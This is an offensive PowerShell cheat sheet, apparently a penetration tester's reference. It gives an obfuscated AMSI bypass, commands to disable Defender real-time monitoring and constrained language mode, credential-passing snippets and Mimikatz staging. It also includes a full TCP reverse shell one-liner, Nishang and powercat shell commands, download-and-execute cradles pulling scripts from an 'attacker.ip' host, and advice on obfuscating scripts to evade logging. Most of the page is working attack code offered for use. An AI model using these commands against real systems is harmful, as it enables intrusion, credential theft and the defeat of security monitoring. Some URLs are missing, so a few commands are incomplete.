Offensive Powershell

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}

# If you are over C2 and cant get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername -Credential $cred -scriptblock {whoami}

AMSI Bypass

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Execution Policy

powershell -ep bypass



Checking Language Mode


When constrained can add the functions at end of script.

E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you.

Disabling Constrained Language Mode

Note: This only works if its set locally. Needs to be run as system and is two underscores.

# Check (4 = constrained, 8 = unconstrained)

# Change
setx __PSLockdownPolicy "8" /M

Applocker Policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Copy File to target

Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files'
Copy-Item C:\file C:\Users\target\ -ToSession $sess
Copy-Item C:\Users\target\file C:\ -FromSession $sess

Reverse Shell Nishang

powershell.exe iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443)

Might need to modify nishang script first so that the function name is correct.

Reverse Shell Listener

Import-Module .\powercat.ps1
powercat -l -v -p 443

Reverse Shell One Liner

$client = New-Object System.Net.Sockets.TCPClient("",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1'))

Ping Sweep

# Sweep computers in a /24 subnet
1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}

Testing Ports

Test-NetConnection -ComputerName <name> -Port <port>

# Nishang
Invoke-PortScan -StartAddress <IP> -EndAddress <IP> [-PortScan] [-Port <>]


Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel ( are very useful for implementing obfuscation.

Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction ( is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See:

Last updated